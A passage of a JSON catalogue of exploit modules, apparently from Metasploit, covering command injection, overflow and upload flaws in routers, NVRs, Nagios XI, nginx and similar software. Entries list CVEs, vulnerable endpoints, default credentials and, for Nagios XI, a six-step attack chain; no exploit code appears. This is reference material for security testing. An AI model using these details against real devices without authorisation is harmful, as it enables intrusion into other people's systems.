"description": "The Linksys WRT100 and WRT110 consumer routers are vulnerable to a command\n injection exploit in the ping field of the web interface.",
"references": [
"CVE-2013-3568",
"BID-61151",
"URL-https://seclists.org/bugtraq/2013/Jul/78"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsel Payload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt110_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_wrt160nv2_apply_exec": {
"name": "Linksys WRT160nv2 apply.cgi Remote Command Injection",
"full_name": "exploit/linux/http/linksys_wrt160nv2_apply_exec",
"rank": 600,
"disclosure_date": "2013-02-11",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection on\n their web interface where default credentials are admin/admin or admin/password.\n Since it is a blind OS command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. This module has been tested on\n a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a\n controlled system could be used for testing purposes. The exploit uses the tftp\n client from the device to stage to native payloads from the command injection.",
"references": [
"BID-57887",
"EDB-24478",
"OSVDB-90093",
"URL-http://www.s3cur1ty.de/m1adv2013-012"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt160nv2_apply_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_wrt54gl_apply_exec": {
"name": "Linksys WRT54GL apply.cgi Command Execution",
"full_name": "exploit/linux/http/linksys_wrt54gl_apply_exec",
"rank": 0,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection in\n the Web Interface. Default credentials are admin/admin or admin/password. Since it\n is a blind os command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes. The user must be prudent when using this\n module since it modifies the router configuration while exploitation, even when it\n tries to restore previous values.",
"references": [
"CVE-2005-2799",
"OSVDB-89912",
"BID-57459",
"EDB-24202",
"URL-http://www.s3cur1ty.de/m1adv2013-001"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wrt54gl_apply_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_wvbr0_user_agent_exec_noauth": {
"name": "Linksys WVBR0-25 User-Agent Command Execution",
"full_name": "exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth",
"rank": 600,
"disclosure_date": "2017-12-13",
"type": "exploit",
"author": [
"HeadlessZeke"
],
"description": "The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie\n cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41\n of the web management portal via the User-Agent header. Authentication is not required to\n exploit this vulnerability.",
"references": [
"CVE-2017-17411",
"ZDI-17-973",
"URL-https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-12-21 23:10:26 +0000",
"path": "/modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_wvbr0_user_agent_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/logsign_exec": {
"name": "Logsign Remote Command Injection",
"full_name": "exploit/linux/http/logsign_exec",
"rank": 600,
"disclosure_date": "2017-02-26",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in Logsign.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the root user.\n\n Logsign has a publicly accessible endpoint. That endpoint takes a user\n input and then use it during operating system command execution without\n proper validation.\n\n This module was tested against 4.4.2 and 4.4.137 versions.",
"references": [
"URL-https://pentest.blog/unexpected-journey-3-visiting-another-siem-and-uncovering-pre-auth-privileged-remote-code-execution/"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/logsign_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/logsign_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/mailcleaner_exec": {
"name": "Mailcleaner Remote Code Execution",
"full_name": "exploit/linux/http/mailcleaner_exec",
"rank": 600,
"disclosure_date": "2018-12-19",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an\n operating system command under the context of the web server user which is root.\n\n /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing\n operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.",
"references": [
"URL-https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/",
"CVE-2018-20323"
],
"platform": "Python,Unix",
"arch": "python, cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Python payload",
"Command payload"
],
"mod_time": "2019-04-02 12:51:09 +0000",
"path": "/modules/exploits/linux/http/mailcleaner_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/mailcleaner_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/microfocus_secure_messaging_gateway": {
"name": "MicroFocus Secure Messaging Gateway Remote Code Execution",
"full_name": "exploit/linux/http/microfocus_secure_messaging_gateway",
"rank": 600,
"disclosure_date": "2018-06-19",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway.\n An unauthenticated user can execute a terminal command under the context of the web user.\n\n One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system.\n manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible\n to access this endpoint without having a valid session.\n\n Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n of the web user.",
"references": [
"URL-https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
"CVE-2018-12464",
"CVE-2018-12465",
"URL-https://support.microfocus.com/kb/doc.php?id=7023132",
"URL-https://support.microfocus.com/kb/doc.php?id=7023133"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-31 00:57:32 +0000",
"path": "/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb",
"is_install_path": true,
"ref_name": "linux/http/microfocus_secure_messaging_gateway",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/multi_ncc_ping_exec": {
"name": "D-Link/TRENDnet NCC Service Command Injection",
"full_name": "exploit/linux/http/multi_ncc_ping_exec",
"rank": 300,
"disclosure_date": "2015-02-26",
"type": "exploit",
"author": [
"Peter Adkins <peter.adkins@kernelpicnic.net>",
"Tiago Caetano Henriques",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a remote command injection vulnerability on several routers. The\n vulnerability exists in the ncc service, while handling ping commands. This module has\n been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices\n are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L\n (Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link\n DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)\n v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link\n DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)\n v2.01b01",
"references": [
"CVE-2015-1187",
"BID-72816",
"URL-https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2",
"URL-https://seclists.org/fulldisclosure/2015/Mar/15",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsel Payload",
"Linux mipsbe Payload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/multi_ncc_ping_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/multi_ncc_ping_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/mutiny_frontend_upload": {
"name": "Mutiny 5 Arbitrary File Upload",
"full_name": "exploit/linux/http/mutiny_frontend_upload",
"rank": 600,
"disclosure_date": "2013-05-15",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in the Mutiny 5 appliance. The\n EditDocument servlet provides a file upload function to authenticated users. A\n directory traversal vulnerability in the same functionality allows for arbitrary\n file upload, which results in arbitrary code execution with root privileges. In\n order to exploit the vulnerability a valid user (any role) in the web frontend is\n required. The module has been tested successfully on the Mutiny 5.0-1.07 appliance.",
"references": [
"CVE-2013-0136",
"OSVDB-93444",
"US-CERT-VU-701572",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
],
"platform": "Linux",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Mutiny 5.0-1.07 Appliance (Linux)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/mutiny_frontend_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/mutiny_frontend_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/mvpower_dvr_shell_exec": {
"name": "MVPower DVR Shell Unauthenticated Command Execution",
"full_name": "exploit/linux/http/mvpower_dvr_shell_exec",
"rank": 600,
"disclosure_date": "2015-08-23",
"type": "exploit",
"author": [
"Paul Davies (UHF-Satcom)",
"Andrew Tierney (Pen Test Partners)",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution\n vulnerability in MVPower digital video recorders. The 'shell' file\n on the web interface executes arbitrary operating system commands in\n the query string.\n\n This module was tested successfully on a MVPower model TV-7104HE with\n firmware version 1.8.4 115215B9 (Build 2014/11/17).\n\n The TV-7108HE model is also reportedly affected, but untested.",
"references": [
"URL-https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
"URL-https://www.pentestpartners.com/blog/pwning-cctv-cameras/"
],
"platform": "Linux",
"arch": "armle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/mvpower_dvr_shell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/nagios_xi_chained_rce": {
"name": "Nagios XI Chained Remote Code Execution",
"full_name": "exploit/linux/http/nagios_xi_chained_rce",
"rank": 600,
"disclosure_date": "2016-03-06",
"type": "exploit",
"author": [
"Francesco Oddo",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an SQL injection, auth bypass, file upload,\n command injection, and privilege escalation in Nagios XI <= 5.2.7\n to pop a root shell.",
"references": [
"EDB-39899"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Nagios XI <= 5.2.7"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/nagios_xi_chained_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nagios_xi_chained_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/nagios_xi_chained_rce_2_electric_boogaloo": {
"name": "Nagios XI Chained Remote Code Execution",
"full_name": "exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo",
"rank": 0,
"disclosure_date": "2018-04-17",
"type": "exploit",
"author": [
"Cale Smith",
"Benny Husted",
"Jared Arave"
],
"description": "This module exploits a few different vulnerabilities in Nagios XI 5.2.6-5.4.12 to gain remote root access.\n The steps are:\n 1. Issue a POST request to /nagiosql/admin/settings.php which sets the database user to root.\n 2. SQLi on /nagiosql/admin/helpedit.php allows us to enumerate API keys.\n 3. The API keys are then used to add an administrative user.\n 4. An authenticated session is established with the newly added user\n 5. Command Injection on /nagiosxi/backend/index.php allows us to execute the payload with nopasswd sudo,\n giving us a root shell.\n 6. Remove the added admin user and reset the database user.",
"references": [
"EDB-44560",
"CVE-2018-8733",
"CVE-2018-8734",
"CVE-2018-8735",
"CVE-2018-8736",
"URL-http://blog.redactedsec.net/exploits/2018/04/26/nagios.html"
],
"platform": "Linux",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Nagios XI 5.2.6 <= 5.4.12"
],
"mod_time": "2018-11-25 04:22:11 +0000",
"path": "/modules/exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.rb",
"is_install_path": true,
"ref_name": "linux/http/nagios_xi_chained_rce_2_electric_boogaloo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_dgn1000_setup_unauth_exec": {
"name": "Netgear DGN1000 Setup.cgi Unauthenticated RCE",
"full_name": "exploit/linux/http/netgear_dgn1000_setup_unauth_exec",
"rank": 600,
"disclosure_date": "2013-06-05",
"type": "exploit",
"author": [
"Mumbai",
"Robort Palerie <roberto@greyhats.it>"
],
"description": "This module exploits an unauthenticated OS command execution vulneralbility\n in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and\n DGN2000v1 models.",
"references": [
"EDB-25978"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-10 18:15:22 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn1000_setup_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_dgn1000b_setup_exec": {
"name": "Netgear DGN1000B setup.cgi Remote Command Execution",
"full_name": "exploit/linux/http/netgear_dgn1000b_setup_exec",
"rank": 600,
"disclosure_date": "2013-02-06",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Netgear Routers are vulnerable to authenticated OS Command injection. The\n vulnerability exists in the web interface, specifically in the setup.cgi component,\n when handling the TimeToLive parameter. Default credentials are always a good\n starting point, admin/admin or admin/password could be a first try. Since it is a\n blind os command injection vulnerability, there is no output for the executed\n command when using the cmd generic payload. A ping command against a controlled\n system could be used for testing purposes.",
"references": [
"BID-57836",
"EDB-24464",
"OSVDB-89985",
"URL-http://www.s3cur1ty.de/m1adv2013-005"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsbe Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn1000b_setup_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/netgear_dgn2200b_pppoe_exec": {
"name": "Netgear DGN2200B pppoe.cgi Remote Command Execution",
"full_name": "exploit/linux/http/netgear_dgn2200b_pppoe_exec",
"rank": 0,
"disclosure_date": "2013-02-15",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Netgear Routers are vulnerable to an authenticated OS command injection\n on their web interface. Default credentials for the web interface are admin/admin\n or admin/password. Since it is a blind os command injection vulnerability, there\n is no output for the executed command when using the cmd generic payload. A ping\n command against a controlled system could be used for testing purposes. This module\n overwrites parts of the PPOE configuration, while the module tries to restore it\n after exploitation configuration backup is recommended.",
"references": [
"BID-57998",
"EDB-24513",
"OSVDB-90320",
"URL-http://www.s3cur1ty.de/m1adv2013-015"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsbe Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dgn2200b_pppoe_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/netgear_dnslookup_cmd_exec": {
"name": "Netgear DGN2200 dnslookup.cgi Command Injection",
"full_name": "exploit/linux/http/netgear_dnslookup_cmd_exec",
"rank": 600,
"disclosure_date": "2017-02-25",
"type": "exploit",
"author": [
"thecarterb",
"SivertPL"
],
"description": "This module exploits a command injection vulnerablity in NETGEAR\n DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request\n with valid login details.",
"references": [
"EDB-41459",
"CVE-2017-6334"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR DDGN2200 Router"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/netgear_dnslookup_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_dnslookup_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_r7000_cgibin_exec": {
"name": "Netgear R7000 and R6400 cgi-bin Command Injection",
"full_name": "exploit/linux/http/netgear_r7000_cgibin_exec",
"rank": 600,
"disclosure_date": "2016-12-06",
"type": "exploit",
"author": [
"thecarterb",
"Acew0rm"
],
"description": "This module exploits an arbitrary command injection vulnerability in\n Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.",
"references": [
"EDB-40889",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305",
"US-CERT-VU-582384",
"URL-http://kb.netgear.com/000036386/CVE-2016-582384",
"CVE-2016-6277"
],
"platform": "Linux",
"arch": "armle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-08-28 13:12:43 +0000",
"path": "/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_r7000_cgibin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_readynas_exec": {
"name": "NETGEAR ReadyNAS Perl Code Evaluation",
"full_name": "exploit/linux/http/netgear_readynas_exec",
"rank": 0,
"disclosure_date": "2013-07-12",
"type": "exploit",
"author": [
"Craig Young",
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The\n vulnerability exists on the web front end, specifically in the np_handler.pl component,\n due to an insecure usage of the eval() perl function. This module has been tested\n successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment.",
"references": [
"CVE-2013-2751",
"OSVDB-98826",
"URL-http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/",
"URL-http://www.tripwire.com/register/security-advisory-netgear-readynas/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR ReadyNAS 4.2.23"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/netgear_readynas_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_readynas_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_unauth_exec": {
"name": "Netgear Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/netgear_unauth_exec",
"rank": 600,
"disclosure_date": "2016-02-25",
"type": "exploit",
"author": [
"Daming Dominic Chen <ddchen@cs.cmu.edu>",
"Imran Dawoodjee <imrandawoodjee.infosec@gmail.com>"
],
"description": "From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,\n (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in\n Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,\n WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute\n arbitrary commands.",
"references": [
"CVE-2016-1555",
"URL-https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic",
"PACKETSTORM-135956",
"URL-http://seclists.org/fulldisclosure/2016/Feb/112"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-12 13:24:00 +0000",
"path": "/modules/exploits/linux/http/netgear_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/netgear_wnr2000_rce": {
"name": "NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow",
"full_name": "exploit/linux/http/netgear_wnr2000_rce",
"rank": 600,
"disclosure_date": "2016-12-20",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi\n parameter.\n In order to exploit it, it is necessary to guess the value of a certain timestamp which\n is in the configuration of the router. An authenticated attacker can simply fetch this\n from a page, but an unauthenticated attacker has to brute force it.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module implements both modes, and it works very reliably. It has been tested with\n the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware\n revisions v4 and v3, but this has not been tested - with these routers it might be necessary\n to adjust the LibcBase variable as well as the gadget addresses.",
"references": [
"CVE-2016-10174",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt",
"URL-https://seclists.org/fulldisclosure/2016/Dec/72",
"URL-http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR WNR2000v5"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/netgear_wnr2000_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/netgear_wnr2000_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/nginx_chunked_size": {
"name": "Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow",
"full_name": "exploit/linux/http/nginx_chunked_size",
"rank": 500,
"disclosure_date": "2013-05-07",
"type": "exploit",
"author": [
"Greg MacManus",
"hal",
"saelo"
],
"description": "This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.\n The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by\n supplying an overly long hex value as chunked block size. This value is later used\n when determining the number of bytes to read into a stack buffer, thus the overflow\n becomes possible.",
"references": [
"CVE-2013-2028",
"OSVDB-93037",
"URL-http://nginx.org/en/security_advisories.html",
"PACKETSTORM-121560"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ubuntu 13.04 32bit - nginx 1.4.0",
"Debian Squeeze 32bit - nginx 1.4.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/nginx_chunked_size.rb",
"is_install_path": true,
"ref_name": "linux/http/nginx_chunked_size",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/nuuo_nvrmini_auth_rce": {
"name": "NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution",
"full_name": "exploit/linux/http/nuuo_nvrmini_auth_rce",
"rank": 600,
"disclosure_date": "2016-08-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable\n to an authenticated remote code execution on the exposed web administration interface. An administrative\n account is needed to exploit this vulnerability.\n This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.\n This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.",
"references": [
"CVE-2016-5675",
"US-CERT-VU-856152",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt",
"URL-https://seclists.org/bugtraq/2016/Aug/45"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"NUUO NVRmini 2",
"ReadyNAS NETGEAR Surveillance",
"NUUO Crystal"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nuuo_nvrmini_auth_rce",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/nuuo_nvrmini_unauth_rce": {
"name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/nuuo_nvrmini_unauth_rce",
"rank": 600,
"disclosure_date": "2016-08-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The NVRmini 2 Network Video Recorder and the ReadyNAS Surveillance application are vulnerable\n to an unauthenticated remote code execution on the exposed web administration interface.\n This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.",
"references": [
"CVE-2016-5674",
"US-CERT-VU-856152",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt",
"URL-https://seclists.org/bugtraq/2016/Aug/45"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
